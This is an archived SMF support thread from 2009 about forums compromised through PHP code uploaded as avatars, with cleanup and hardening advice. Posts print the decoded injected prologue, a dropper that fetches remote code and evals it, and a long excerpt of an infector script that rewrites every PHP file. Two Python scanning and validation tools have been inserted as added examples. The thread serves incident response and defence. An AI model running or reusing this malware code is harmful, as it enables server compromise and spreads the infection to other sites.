Simple Machines Community Forum

SMF Support => SMF 1.1.x Support => Topic started by: vHawkeyev on May 01, 2009, 10:47:02 AM

Title: Hacked, script injection
Post by: vHawkeyev on May 01, 2009, 10:47:02 AM
All the php files on my site have been injected with Base64-encoded text that translates to

Code: [Select]
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php')){include_once('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}
I had a look at the style.css.php file and it has been encoded multiple times. I finally got it all decoded but I don't know what it all means.

I removed the code from all my pages and deleted the style.css.php, but when I went to change my theme in my profile it came up with this page that showed details about my server and a list of directories, as well as all files that had been reinjected with the code above, and the style.css.php file reappeared. I'm stuck, I don't know what to do.

Please help.
Title: Re: Hacked, script injection
Post by: kat on May 01, 2009, 12:50:54 PM
If you don't have any mods installed, just upload fresh files from the SMF install package.

DO NOT OVERWRITE Settings.php

If you have mods, though, that will not be such a good idea.

Of course, you could restore a recent backup, if you have one...
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 01, 2009, 12:54:16 PM
Quote
All the php files on my site have been injected with Base64-encoded text that translates to
Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.
Title: Re: Hacked, script injection
Post by: Joey Smith™ on May 01, 2009, 01:21:38 PM
Quote
style.css.php
This is not supposed to be a php file. Its a css file...
Title: Re: Hacked, script injection
Post by: bsm on May 01, 2009, 02:57:12 PM
I have the exact same problem.

My plan is to remove SMF, then rebuild my site from backups.

As for "krisbarteo" - I had no such member, (my hacker was: 'Boommurne' ) but I do have an IP address of the culprit: 24.126.184.8

I'll do an admin on the DB and see what (if anything) was uploaded. (Also going to suspend uploads until I've got things cleared up).

What a mess!!!
Title: Re: Hacked, script injection
Post by: karlbenson on May 01, 2009, 03:02:04 PM
What version of smf are you using? 1.1.8?
What mods are you using?
Are you using any integrations?

Are you using any of these on that server?
- wordpress
- any software with tinymce editor?
Title: Re: Hacked, script injection
Post by: bsm on May 01, 2009, 03:08:30 PM
I'm using 1.1.8, with Ad mod - also TP 0.9.8

Just checked (I have an identical install that I use for testing) avatars - both the same. So, it wasn't an avatar.

There's no other SW on the domain in question.
Title: Re: Hacked, script injection
Post by: vHawkeyev on May 01, 2009, 07:25:53 PM
Yes I do have the member krisbarteo

It doesn't seem as if he has uploaded an avatar but when I had a look in my attachments folder I found his avatar, I then downloaded it and opened it in notepad and I found php code. I use the attachments folder for storing avatars.

I have deleted everything to do with krisbarteo and added his IP to my server blacklist.

Mods Installed:
Updated Registration Agreement
The Rules
Title: Re: Hacked, script injection
Post by: Kindred on May 01, 2009, 07:28:19 PM
What version of SMF were you running? 
Title: Re: Hacked, script injection
Post by: vHawkeyev on May 01, 2009, 07:35:50 PM
1.1.8
Title: Re: Hacked, script injection
Post by: bsm on May 02, 2009, 06:52:06 AM
I'm using 1.1.8 as well.

I'm diving in, replacing all PHP scripts with "clean" ones. Probably take me all day.

Once done, I'll have a clean backup of all my scripts so if this happens again I can just FTP the site back to normal.

"phasers on stun - we're going in"
Title: Re: Hacked, script injection
Post by: sprntrcr on May 02, 2009, 06:59:14 AM
Using 1.1.8

I had the same issue and timestamps showed that it all started minutes after user krisbarteo joined the forum.

I banned him and removed his avatar file. I diffed against a backup and removed the base64 crap from about 50 files. Also check Themes/default/images/bbc; that is where a bunch of advertising for casinos was stashed.

It appears the avatar that was uploaded was an injection script, so I have disabled uploading of avatars until this issue is resolved.

Google "krisbarteo" and see all the SMF forums he is a member of. This is/could get real nasty.
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 02, 2009, 07:06:13 AM
What other scripts are you running along SMF?
Title: Re: Hacked, script injection
Post by: vHawkeyev on May 02, 2009, 07:31:17 AM
I managed to get rid of the script injections by deleting krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then I uploaded clean versions of all php files.

But now I'm having troubles with my themes.
Title: Re: Hacked, script injection
Post by: bsm on May 04, 2009, 05:53:50 AM
The script injection will affect ALL your php scripts, including themes.

I'm about halfway through manually removing them all before the big upload.

oy vey... what a mess ! :'(
Title: Re: Hacked, script injection
Post by: vHawkeyev on May 04, 2009, 06:34:25 AM
Quote
I managed to get rid of the script injections by deleting krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then I uploaded clean versions of all php files.

Like you said, it affects all php files, so I replaced every one.
Title: Re: Hacked, script injection
Post by: Agent Orange on May 04, 2009, 04:44:33 PM
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

Quote
DO NOT OVERWRITE Settings.php

What happens if you do that?

Never mind, I guess I got lucky first time around, as I didn't have a copy of that particular file (and as such, didn't overwrite it).
Title: Re: Hacked, script injection
Post by: JBlaze on May 04, 2009, 04:47:53 PM
Quote
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

DO NOT OVERWRITE Settings.php

I believe I actually did that first time around. What effect did it have on my forum?

Settings.php is what controls the connection between your forum and your database. It contains all the login info needed to connect.

To reset your Settings.php so it can connect back to your forum, use the repair_settings.php tool: What is repair_settings.php? (http://docs.simplemachines.org/index.php?topic=663)
Title: Re: Hacked, script injection
Post by: H on May 04, 2009, 05:03:20 PM
Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain
Title: Re: Hacked, script injection
Post by: JBlaze on May 04, 2009, 05:56:22 PM
Quote
Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain

Also, to elaborate on that, there was a recent hack I had to "sanitize" where the hacker had injected extra php files into almost every directory. Make sure that there are no randomly named files, and also check your .htaccess for extra code as well.

On another note, check your index.php in the forum root directory as well as index.template.php in your themes directory for unwanted code.

These are all common places for hackers to inject code.
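The checklist above (injected prologue in every PHP file, stray PHP files such as style.css.php under Themes/default/images/bbc, PHP code hiding in attachment files) can be run as a scan over the forum tree. The script below is an added example, not SMF's own tooling; the injected-prologue pattern follows the `<?php /**/ eval(base64_decode(...));?>` form the dropper posted later in this thread strips and re-adds, the dropper filenames s.php and dg.php come from that same dump, and the sample tree it builds is constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Prologue the dropper prepends to each PHP file. The pattern mirrors the
# expression the dropper itself uses (see the dump later in this thread) to
# remove its own earlier copy before re-injecting.
INJECTED_PROLOGUE = re.compile(
    rb"^\s*<\?(\w{3})?\s*/\*\*/\s*eval\(base64_decode\(", re.IGNORECASE)
# Looser form: eval(base64_decode( anywhere in a PHP file.
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)
# PHP open tag, used to find PHP source stored under a non-PHP name or with
# no extension at all (SMF stores attachments, avatars included, that way).
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
# Filenames the dropper writes: style.css.php from the first post, s.php and
# dg.php from the dropper's own configuration in the dump.
DROPPER_NAMES = {"style.css.php", "s.php", "dg.php"}
PHP_SUFFIXES = {".php", ".php3", ".phtml"}


def scan_tree(root: Path) -> List[Tuple[str, str]]:
    """Walk the forum tree and return (relative path, reason) findings.
    Files are read as bytes; nothing is modified, so the output can be
    compared against a diff from a known-clean backup."""
    findings: List[Tuple[str, str]] = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        if path.name.lower() in DROPPER_NAMES:
            findings.append((rel, "known dropper filename"))
        if path.suffix.lower() in PHP_SUFFIXES:
            # Themes/default/images/bbc should hold images only.
            if "/images/" in "/" + rel:
                findings.append((rel, "php file inside an images directory"))
            if INJECTED_PROLOGUE.match(data):
                findings.append((rel, "injected eval(base64_decode) prologue"))
            elif EVAL_B64.search(data):
                findings.append((rel, "eval(base64_decode) call present"))
        elif PHP_OPEN_TAG.search(data):
            # Catches the renamed-script avatar without relying on extensions.
            findings.append((rel, "php code in a non-php file"))
    return findings


def build_sample_tree() -> Path:
    """Write a small constructed forum tree into a temp dir, mixing clean
    files with the kinds of artefacts reported in this thread."""
    root = Path(tempfile.mkdtemp(prefix="smf_scan_"))
    samples = {
        # Constructed: a file carrying the injected prologue ahead of real code.
        "index.php": b"<?php /**/eval(base64_decode('aGVsbG8='));?>\n"
                     b"<?php\n// forum entry point\n",
        "Sources/Load.php": b"<?php\n// clean file\nfunction loadSettings() {}\n",
        "Themes/default/images/bbc/style.css.php": b"<?php echo 'not a stylesheet';\n",
        # Constructed: PHP source stored as an extensionless attachment.
        "attachments/12_0a1b2c": b"<?php;$url='http://example.invalid/?u=1';eval($ret);?>",
        "attachments/13_d4e5f6": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
        "Themes/default/style.css": b"body { color: #000; }\n",
    }
    for rel, data in samples.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)
    return root


if __name__ == "__main__":
    for rel, reason in scan_tree(build_sample_tree()):
        print(f"{reason:45} {rel}")
```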
Title: Re: Hacked, script injection
Post by: MrPhil on May 04, 2009, 06:35:15 PM
Wow, that guy (krisbarteo) sure is busy! Just wondering... would it be Simple Machines' business to blast an email to all known SMF installations warning them about this guy? You'd have to be careful to phrase the warning in such a way that it's not legally an accusation (libelous) telling boards to dump this guy, but rather a pointer to discussions such as this one. That user name is going on my ban list right away!

That being done, do we yet know what vulnerability he exploited? Was it in a browser? Was it SMF permitting unrestricted file types for avatars?

Add:
I thought about adding code to ban particular user names, but figured that they'd just register under some other name. If the problem is that their avatar image contains some kind of booby trap, what is the nature of the beast? Are they uploading a .php file as the avatar? In that case, a simple check on permitted extensions should fix the problem. Are they uploading a legitimate extension (.jpg, .png, .gif, etc.) and it somehow contains malicious code? Could SMF scan for certain strings in an avatar image before accepting it? If not, could new avatars be uploaded to a different directory and quarantined awaiting Admin inspection and movement into the production directory? I assume that it's not a browser vulnerability to embedded code (I think I recall such a thing a few years back), but somehow code that gets run on the server?

If this information isn't suitable for public dissemination, but you would like to request my help in coding something to fight this attack, please feel free to PM me with details.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 04, 2009, 08:44:41 PM
<<< I found his avatar, I then downloaded it and opened it in notepad and I found php code. >>>

Are you saying that his avatar was an actual image with an image extension, but with embedded php script?
Title: Re: Hacked, script injection
Post by: vHawkeyev on May 05, 2009, 07:18:02 AM
It wasn't an actual image. It was just like another php file but with .jpg as the extension. I'm guessing it was used to upload other php files to my server.
Title: Re: Hacked, script injection
Post by: MrPhil on May 05, 2009, 09:03:56 AM
So if avatar "images" were scanned for <? and possibly a few PHP keywords, that might detect code sailing under false colors? How about looking for image format keywords (e.g., GIF89a) in the right place, to confirm it's likely a real image file?
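The two checks suggested here, a signature check at the start of the file and a scan for PHP markers inside it, can be combined in one validator. This is an added example rather than SMF's upload code: the accepted extensions, the function-name list and the sample byte strings are constructed for the demonstration, and it rejects both a PHP script renamed to .jpg (the case described above) and a genuine image with PHP appended after the image data.

```python
import re
from typing import Tuple

# File signatures for the image types an avatar upload may carry. GIF files
# start with GIF87a/GIF89a (the keyword mentioned above), JPEG with the SOI
# marker FF D8 FF, PNG with a fixed 8-byte signature.
SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}

# A PHP open tag followed by "php" or "=". The bare short tag "<?" is not
# matched on its own: the two bytes 3C 3F occur by chance in compressed image
# data and would cause legitimate avatars to be rejected.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

# A few function names that image data never spells out in ASCII; the list is
# an assumption for this example, chosen from calls seen in this thread.
PHP_KEYWORDS = re.compile(
    rb"\b(eval|base64_decode|fsockopen|include_once)\s*\(", re.IGNORECASE)


def check_avatar(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for an uploaded avatar.

    Rejects when the extension is not an image type, when the bytes do not
    begin with that type's signature, or when PHP code appears anywhere in
    the file (a script renamed to .jpg, or a real image with a payload
    appended after the image data)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in SIGNATURES:
        shown = ext or "(none)"
        return False, f"extension '{shown}' is not an allowed image type"
    if not any(data.startswith(sig) for sig in SIGNATURES[ext]):
        return False, f"content does not begin with a {ext.upper()} signature"
    if PHP_OPEN_TAG.search(data):
        return False, "PHP open tag found inside image data"
    if PHP_KEYWORDS.search(data):
        return False, "PHP function call found inside image data"
    return True, "ok"


# Constructed samples, not files from the thread.
GOOD_GIF = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16 + b";"
# A PHP script uploaded under a .jpg name, the shape of the avatar described above.
SCRIPT_AS_JPG = b"<?php;$url='http://example.invalid/?update=main';eval($ret);?>"
# A valid GIF header with a PHP payload appended after the image data.
POLYGLOT_GIF = GOOD_GIF + b"\n<?php eval(base64_decode('AAAA')); ?>"

if __name__ == "__main__":
    for name, blob in (("me.gif", GOOD_GIF), ("avatar.jpg", SCRIPT_AS_JPG),
                       ("avatar.gif", POLYGLOT_GIF), ("avatar.php", GOOD_GIF)):
        print(name, check_avatar(name, blob))
```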
Title: Re: Hacked, script injection
Post by: Tiribulus on May 05, 2009, 09:42:32 AM
Okay, but then what about attachments and gallery items? Doesn't it seem like this could turn into a processor resource nightmare on a busy site? Probably preferable to being successfully attacked, but just sayin'. If you cover all bases your site is soon transformed into a file scanning engine, so to speak.
Title: Re: Hacked, script injection
Post by: DirtRider on May 05, 2009, 10:15:39 AM
Could we get an IP on this guy to add it to our ban list? Looks like he is hitting SMF forums big time, check this out: http://www.google.co.za/search?hl=en&q=krisbarteo&btnG=Google+Search&meta=&aq=f&oq=
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 05, 2009, 10:20:14 AM
Quote
Okay, but then what about attachments and gallery items? Doesn't it seem like this could turn into a processor resource nightmare on a busy site? Probably preferable to being successfully attacked, but just sayin'. If you cover all bases your site is soon transformed into a file scanning engine, so to speak.
Attachment names are encrypted for a reason you know ;)
Title: Re: Hacked, script injection
Post by: Tiribulus on May 05, 2009, 10:22:37 AM
Quote
Okay, but then what about attachments and gallery items? Doesn't it seem like this could turn into a processor resource nightmare on a busy site? Probably preferable to being successfully attacked, but just sayin'. If you cover all bases your site is soon transformed into a file scanning engine, so to speak.
Quote
Attachment names are encrypted for a reason you know ;)

Well gaaahhlee. Forgot about that  :-[
Title: Re: Hacked, script injection
Post by: DirtRider on May 05, 2009, 10:43:49 AM
I have just counted 730 SMF forums he has registered on, ranging from SMF 1.1.1 to RC1  :o
Title: Re: Hacked, script injection
Post by: busterone on May 05, 2009, 11:37:06 AM
Busy little bee huh? He has not attempted mine yet, but he won't get in under that username.
Quote
Could we get an IP on this guy to add it to our ban list? Looks like he is hitting SMF forums big time, check this out: http://www.google.co.za/search?hl=en&q=krisbarteo&btnG=Google+Search&meta=&aq=f&oq=

I would like more info as well. I do understand it may not be a good idea to openly post this, but I will accept a pm gladly with IP, email addie and any other info anyone has on him.
Title: Re: Hacked, script injection
Post by: DirtRider on May 05, 2009, 11:46:00 AM
Yip me as well if possible  ;D
Title: Re: Hacked, script injection
Post by: JBlaze on May 05, 2009, 12:22:37 PM
How about this, seeing as he gets code injected in through uploaded avatars. How about requiring all avatars be linked to a site like photobucket or imageshack, and disabling uploaded avatars...?
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 05, 2009, 12:34:33 PM
Quote
How about this, seeing as he gets code injected in through uploaded avatars. How about requiring all avatars be linked to a site like photobucket or imageshack, and disabling uploaded avatars...?
Or with an apache server use .htaccess that turns php engine off for a custom avatar folder. ::)
Title: Re: Hacked, script injection
Post by: JBlaze on May 05, 2009, 12:44:06 PM
Quote
How about this, seeing as he gets code injected in through uploaded avatars. How about requiring all avatars be linked to a site like photobucket or imageshack, and disabling uploaded avatars...?
Quote
Or with an apache server use .htaccess that turns php engine off for a custom avatar folder. ::)

That works too...
Title: Re: Hacked, script injection
Post by: CarlT100 on May 05, 2009, 01:02:55 PM
Dirtrider, I found this on the first page of this thread:

Quote
As for "krisbarteo" - I had no such member, (my hacker was: 'Boommurne' ) but I do have an IP address of the culprit: 24.126.184.8
Title: Re: Hacked, script injection
Post by: busterone on May 05, 2009, 02:29:10 PM
I don't allow avatar uploads anyway. They must be linked to photobucket, etc. The only allowed attachments are by admins, and those are limited and encrypted, so most likely I have no worries from this guy. I have had over a dozen new members in the last 2 weeks that have gotten past the anti-spam and confirmed the email address. Once they log on, they only stay about 2 to 5 minutes, log off and do not return. Could be they are looking to upload an avatar or attachment, realize they can't, and then move on somewhere else.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 05, 2009, 03:33:28 PM
Would this work?

Code: [Select]
# Apache: refuse to serve any file with a script-like extension in this directory
<FilesMatch "\.(php.*|s?p?html|cgi|pl)$">
deny from all
</FilesMatch>

This is supposed to also kill html, cgi and perl executions as well. Before I create the file I wanted to bounce it off some of you guys first.
Title: Re: Hacked, script injection
Post by: H on May 05, 2009, 04:27:29 PM
Quote
Would this work?

Code: [Select]
# Apache: refuse to serve any file with a script-like extension in this directory
<FilesMatch "\.(php.*|s?p?html|cgi|pl)$">
deny from all
</FilesMatch>

This is supposed to also kill html, cgi and perl executions as well. Before I create the file I wanted to bounce it off some of you guys first.

On some servers, files are being run through php even though they do not have a php ending. Therefore I do not think this would work.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 05, 2009, 04:45:22 PM
Quote
On some servers, files are being run through php even though they do not have a php ending. Therefore I do not think this would work.

You're saying that since this stops the action based on the file extension that a file with a different extension, but still containing script code would run anyway.

How then do you use .htaccess to block the engine altogether as was suggested above. I also found some info on doing it with httpd.conf.
Title: Re: Hacked, script injection
Post by: H on May 05, 2009, 04:57:21 PM
There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess
Title: Re: Hacked, script injection
Post by: Tiribulus on May 05, 2009, 06:28:08 PM
Quote
There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess

It looks like that's right.
Adding an .htaccess file with this php_value engine off entry should work.

Or, it seems you could also add this
Code: [Select]
<Location "/docroot/av_directory">
 php_admin_flag engine off
</Location>
to the httpd.conf file to accomplish the same thing.

I was thinking it might not be a bad idea to throw such a .htaccess file in every directory that doesn't need PHP interpretation, but that might be misused that way.
Title: Re: Hacked, script injection
Post by: hobox on May 05, 2009, 07:29:24 PM
Krisbarteo had done the same to my forum. An avatar 1,82KB large. All my PHP files were corrupted

He came from 94.142.129.147
Title: Re: Hacked, script injection
Post by: MrPhil on May 05, 2009, 11:09:41 PM
Quote
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.
Title: Re: Hacked, script injection
Post by: chrishicks on May 05, 2009, 11:16:33 PM
http://www.stopforumspam.com/search?q=krisbarteo 

This might help somewhat:

http://custom.simplemachines.org/mods/index.php?mod=1547
Title: Re: Hacked, script injection
Post by: Aleksi "Lex" Kilpinen on May 06, 2009, 01:17:48 AM
Quote
There is an option you can set in .htaccess that will disable the use of php completely.

I think it is "php_value engine off" but google should provide more, as I don't normally use Apache/.htaccess
This is correct - I have it in use for a custom avatar folder.
Title: Re: Hacked, script injection
Post by: bsm on May 06, 2009, 04:55:04 AM
Well, it took me a while - but all scripts are clean, and I'm up and running.

NOW, I have a full backup of clean scripts - ready to restore anytime.
Title: Re: Hacked, script injection
Post by: CarlT100 on May 06, 2009, 07:15:22 AM
Quote
http://www.stopforumspam.com/search?q=krisbarteo

This might help somewhat:

http://custom.simplemachines.org/mods/index.php?mod=1547

Thank you for the stopforumspam link. I have saved it, hoping I will not have to use it.
Title: Re: Hacked, script injection
Post by: Tiribulus on May 06, 2009, 10:53:13 AM
What I found out so far is that the host has to have AllowOverride set in httpd.conf to permit .htaccess file directives to supersede the global settings in order for this to work with .htaccess files. This might be what the guy above was talking about. The Apache docs say this can have a negative effect on performance due to the scanning required to find the commands in those files. They say, if possible, to include them in the directory section of httpd.conf. Being that the server is sitting at my feet I did this:

Code: [Select]
<Directory "/path to avs dir/">
 php_admin_flag engine off
</Directory>

Now my hello.php file is offered for download instead of being run. Hmmm, I suppose that is preferable to being executed on the server.
Title: Re: Hacked, script injection
Post by: H on May 06, 2009, 01:13:32 PM
Quote
adding an .htaccess file with this php_value engine off entry should work.

On many systems it won't work, as php_value and php_flag are not permitted in .htaccess. For those systems, put something like engine = off in a php.ini file. You may also need to put an entry in .htaccess to tell PHP where to find that file.

Thanks for this. Although it seems a little absurd that hosts prevent these options in .htaccess but yet let the user run a custom php.ini :o
Title: Re: Hacked, script injection
Post by: sjokomelk on May 06, 2009, 01:35:59 PM
I don't know if this will help anyone, but the content of the avatar is the following.
I've cleaned it up a little.

Code: [Select]
<?php;$url 'http://wplsat23.net/?update=main';$done false;if(!$url){return '';}$url_info parse_url($url);$url_info[port] = ($url_info[port]) ? $url_info[port]:80;$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; $url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" $url_info[query] : ""; $query "GET " $url_info[path] . " HTTP/1.1\r\n"; $query $query "Host: " $url_info[host] . "\r\n"; $query $query "Accept: */*" "\r\n"; $query $query "Connection: close" "\r\n"; $query $query "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "\r\n"; $query $query "\r\n"; $errno 0; $error ""; $sock fsockopen($url_info[host], $url_info[port], $errno$error30);$h = array();$resp = array();if($sock){stream_set_timeout($sock30);fwrite($sock$query);$hd false;while(!feof($sock)){$l fgets($sock);if(!$hd){if(trim($l) == ''){$hd true;}else{$h[] = $l;}}else{$resp[] = $l;}}fclose($sock);}$ret implode(""$resp);eval($ret);?>
and this is the code on that page:
Code: [Select]
$ver = "1.0";
$GLOBALS['dbg'] = 0;
$GLOBALS['rewrite_old'] = 1;

set_time_limit(600);
$pu = "http://nomsat23.net/?update=js&host={$_SERVER['HTTP_HOST']}";
$eu = "http://nomsat23.net/?update=shl&host={$_SERVER['HTTP_HOST']}";

//$pu = "http://wpl/?update=js&host={$_SERVER['HTTP_HOST']}";
//$eu = "http://wpl/?update=shl&host={$_SERVER['HTTP_HOST']}";

$GLOBALS['dgin'] = "style.css.php";
$GLOBALS['dgsf'] = "s.php";
$GLOBALS['dgdn'] = "dg.php";
$GLOBALS['dgfn'] = "";

//detect full path
if(!file_exists($_SERVER['SCRIPT_FILENAME'])){
if(file_exists($_SERVER['PATH_TRANSLATED'])){
$_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED'];
}else{
die("<b style='color:red'>can't detect exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[49295073]");
}
}
$_SERVER['SCRIPT_FILENAME'] = str_replace('\\', '/', $_SERVER['SCRIPT_FILENAME']);
$_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']);
echo "<b style='color:green'>exploit full path [{$_SERVER['SCRIPT_FILENAME']}]</b><br>[6910002]<br>";

$tmp = explode("/", $_SERVER['REQUEST_URI']);
$GLOBALS['dglvl'] = count($tmp) - 2;
echo"{$ver}<h2>http://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}</h2>";

$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
$path = array_slice($path, 0, count($path) - 1);
$GLOBALS['fpath'] = implode("/", $path) . '/';

//detecting real path
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);

//print_r($path);
//print_r($uri);

while(count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])){
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
//echo"<hr>";
//print_r($path);
//print_r($uri);

$GLOBALS['dgsp'] = implode("/", $path) . '/';

if(isset($_GET['dgd'])){
error_reporting(E_ALL & ~E_NOTICE);
}else{
error_reporting(0);
}

if(isset($_GET['phpinfo'])){
phpinfo();
die;
}

//$GLOBALS['dgsp'] = $_SERVER['DOCUMENT_ROOT'];
if(substr($GLOBALS['dgsp'], strlen($GLOBALS['dgsp']) - 1, 1) <> '/'){
$GLOBALS['dgsp'] .= '/';
}

echo"<b style=\"color:green\">root dir path [{$GLOBALS['dgsp']}]</b><br><br>";

$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
$my_uid = getmyuid();
$my_gid = getmygid();
$my_cid = get_current_user();
echo "SYSTEM: " . `uname -a` . "<br>";
if(ini_get('safe_mode')){echo "<h1 style='color:red'>SAFE MODE</h1>";}

echo"MY USER ID: {$my_uid}; MY GROUP ID: $my_gid; CURRENT USER: {$my_cid}<br>";

if(!function_exists('phpinj')){
function phpinj($ff, &$str, $inj = 0, $silent = true){
global $_SERVER;
$alien_shells = array("los.php","r0x.php");
$our_folder = 0;
$folder = $ff;
$folder = str_replace('\\', '/', $folder);
if(substr($folder, strlen($folder) - 1, 1) <> '/'){
$folder .= '/';
}
if(!$folder){
if(!$silent){echo"<font color='red'>bad folder path [{$folder}]</font><br>";}
return;
}
if(!is_dir($folder)){
if(!$silent){echo"<font color='red'>{$folder} - is not a folder</font><br>";}
return;
}
if($GLOBALS['dgdirs'][$folder]){
if(!$silent){echo"<font color='yellow'>{$folder} already checked</font><br>";}
return;
}
$GLOBALS['dgdirs'][$folder] = 1;

if($folder == $GLOBALS['dgcp'] || file_exists($folder.$GLOBALS['dgin'])){
if(!$silent){echo"<h4>{$folder} is our dir, skipping...</h4>";}
$our_folder = 1;
}
$dir_perm = substr(sprintf('%o', fileperms($folder)), -4);

$file_stat = stat($folder);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_gidn}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
if(!$silent){echo"{$file_info}[$dir_perm] {$folder}<br>";flush();}
$h = opendir($folder);
if(!$h){
if(!$silent){echo"<font color='red'>{$folder}</font><br>";}
return;
}
while(strlen($f = readdir($h))){
if($f == '.' || $f == '..'){
continue;
}
$pc = 0;
$mkr = md5($f);
$lc = "";
$lp = "";
$fh = false;

$file = $folder.$f;
if($f == $_SERVER['SCRIPT_FILENAME']){
if(!$silent){echo"<h4>{$file} is our exploit</h4>";}
continue;
}
if(is_file($file) && !$our_folder){
if($f == 'functions.php' && (strlen($folder) - strrpos($folder, "wp-includes") == 12)){
if(can_write($file)){
echo"<b style='color:green'>{$file}</b><br>";
dgrself($file, $silent);
}else{
echo"<b style='color:red'>{$file}</b><br>";
}
}
if($f == 's.php'){
if(!$silent){echo"<font color='red'>{$file} is shell</font><br>";}
continue;
}
if(in_array(strtolower($f), $alien_shells)){
if(unlink($file)){
if(!$silent){echo"<h3 style='color:green'>{$file} ALIEN SHELL</h3>";}
}else{
if(!$silent){echo"<h3 style='color:red'>{$file} ALIEN SHELL</h3>";}
}
continue;
}
if(!in_array(strtolower(gfe($file)), array("php","phtml","php3"))){
continue;
}
if($GLOBALS['dgfiles'][$file]){
if(!$silent){echo"<font color='yellow'>{$file} already checked</font><br>";}
continue;
}
$GLOBALS['dgfiles'][$file] = 1;
$file_stat = stat($file);
$file_uid = $file_stat[4];
$file_gid = $file_stat[5];
if(function_exists('posix_getpwuid')){
$file_stat = posix_getpwuid($file_uid);
$file_uidn = "; uname:{$file_stat['name']}";
}
if(function_exists('posix_getgrgid')){
$file_stat = posix_getgrgid($file_gid);
$file_gidn = $file_stat['name'];
$file_gidn = "; gname:{$file_stat['name']}";
}
$file_info = "[uid:{$file_uid}; gid:{$file_gid}{$file_uidn}{$file_gidn}] ";
$file_perm_was = substr(sprintf('%o', fileperms($file)), -4);
$file_handler = fopen($file, "a+");
$perms_str = "{$file_info}[{$file_perm_was}] ";
if(!$file_handler){
if(!$silent){echo"{$perms_str}<font color='red'>{$file}</font><br>";flush();}
continue;
}
fclose($file_handler);
$fc = implode("", file($file));
$nc = preg_replace("/\<\!\-\-$mkr\-\-\>.*\<\!\-\-$mkr\-\-\>/siU", "", $fc);
